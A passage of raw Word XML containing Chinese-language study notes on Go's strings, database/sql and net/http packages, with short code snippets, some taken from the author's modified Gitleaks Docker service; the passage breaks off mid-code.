        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读写缓冲区默认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>New</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出来，是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4096</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ACDCDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处可详见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一节</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A20C36" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBB4C43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6569553E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F8207D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0323A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="297B2851" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc159779783"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w14:paraId="74C667D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A89A632" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>strings.HasPrefix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：看前缀</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB9D450" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">strings.HasPrefix(rule.RuleID, "generic") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D12B630" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41E420F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Strings.Contains:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否包含子串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D148D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E376C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4FBB7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD830B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"strings"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD14D1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24886F09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21187EC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嗨客网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(www.haicoder.net)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3FE85" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Strings.Contains() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，判断一个字符串是否在另一个字符串中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5107FB93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>strHaiCoder := "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>嗨客网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(HaiCoder)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B0647" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">StrContainers := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>strings.Contains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(strHaiCoder, "HaiCoder")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C9D65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("StrContainers =", StrContainers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F1019" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C951D8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70559F3C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>strings.ToLower:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将字符串转换为小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCAC3D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C829D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>var wordFilePath = "E:/BiLing/20220905-gitleaks-Docker/SecretDetection/bindata/american-english"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F9AD97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>wordListTextBytes, err := ioutil.ReadFile(wordFilePath)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A855232" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF27EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单词本文件读取失败</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B67D2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EAAA05" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>wordListText = strings.ToLower(string(wordListTextBytes))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26896DA4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013FEEAB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc159779784"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>
    </w:p>
    <w:p w14:paraId="0CB3D18B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>database/sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A768B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定义数据库连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A22AEEB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func SqliteConn() *sql.DB {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D2545" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>db, err := sql.Open("sqlite3", "sql.db")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AAB8EE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7294F3CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759E3CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8511B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42050540" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A74071" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C6000E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接数据库并开始进行处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0E5256" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>db := SqliteConn()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72799996" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>defer db.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E06025C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">row := db.QueryRow(sql, id) # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值进行查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0795486F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>err := row.Scan(&amp;info.ID, &amp;info.Token, &amp;info.Username, &amp;info.Email, &amp;info.Admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050888F8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>if err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337B3FE0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>c.JSON(400, gin.H{"code": 400, "msg": "ID error!"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E4D8B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490186D1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9DD80A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7475E8D9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A72B847" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1467EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE359F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFF5064" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="328" w:name="_Toc159779785"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net</w:t>
      </w:r>
      <w:bookmarkEnd w:id="328"/>
    </w:p>
    <w:p w14:paraId="10BBE951" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net.http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F28BDD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如展示我修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Gitleaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEC630B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A07AF5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import "net/http"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C99DA4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="155898E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDF8F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Viper := InitConfig()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E73B2B3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>port := Viper.GetString("port")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B80FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务启动，监听端口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" + port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFE2A4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mux := &amp;GitLeaksHttpStruct{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D969607" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:tab/>
